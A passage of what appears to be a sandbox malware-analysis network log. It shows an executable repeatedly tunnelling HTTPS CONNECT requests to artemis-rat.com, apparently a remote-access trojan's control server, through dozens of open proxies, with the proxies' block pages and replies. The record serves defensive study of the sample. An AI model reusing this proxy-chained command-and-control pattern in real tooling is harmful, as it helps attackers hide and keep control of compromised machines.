                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.811286926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.446439028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083571911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.811362028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.201989889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            422192.168.2.551228198.12.255.19368213876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.228336096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.748598099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.389261961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702048063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405239105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.092979908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            423192.168.2.551045194.53.158.57532813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.229993105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.951729059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            424192.168.2.55113293.190.141.102148883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.232759953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.532363892 CET226INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            425192.168.2.5511188.213.128.908083876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.237684011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.548166990 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            426192.168.2.55029172.195.34.4241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.242158890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            427192.168.2.551175174.64.199.7941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.243036032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            428192.168.2.55117398.162.25.2341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.243760109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            429192.168.2.551099157.25.92.7431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.250482082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.595185995 CET1254INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/3.5.28
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 952
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from ah_test
                                                                                                                                                                                                                                                            Via: 1.1 ah_test (squid/3.5.28)
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 30 32 3a 33 30 3a 33 39 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 02:30:39 GMT</p></div></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            430192.168.2.551312104.20.22.93803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.256057024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.420612097 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            431192.168.2.55027951.89.173.40179823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.261322021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.405019999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.505913019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.599607944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.713933945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            432192.168.2.55151543.153.174.1064433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.262609959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            433192.168.2.5510005.32.88.13080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.265412092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.765400887 CET72INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            434192.168.2.551104125.122.26.24210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.265755892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            435192.168.2.551342185.162.229.112803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.278140068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.432765007 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            436192.168.2.55117046.17.63.16641543876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.278719902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.592856884 CET339INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/4.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                                                                                            X-Squid-Error: TCP_RESET 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from proxy.wakoopa.com
                                                                                                                                                                                                                                                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 72 65 73 65 74
                                                                                                                                                                                                                                                            Data Ascii: reset


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            437192.168.2.551090103.118.47.25280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.279439926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.633270025 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
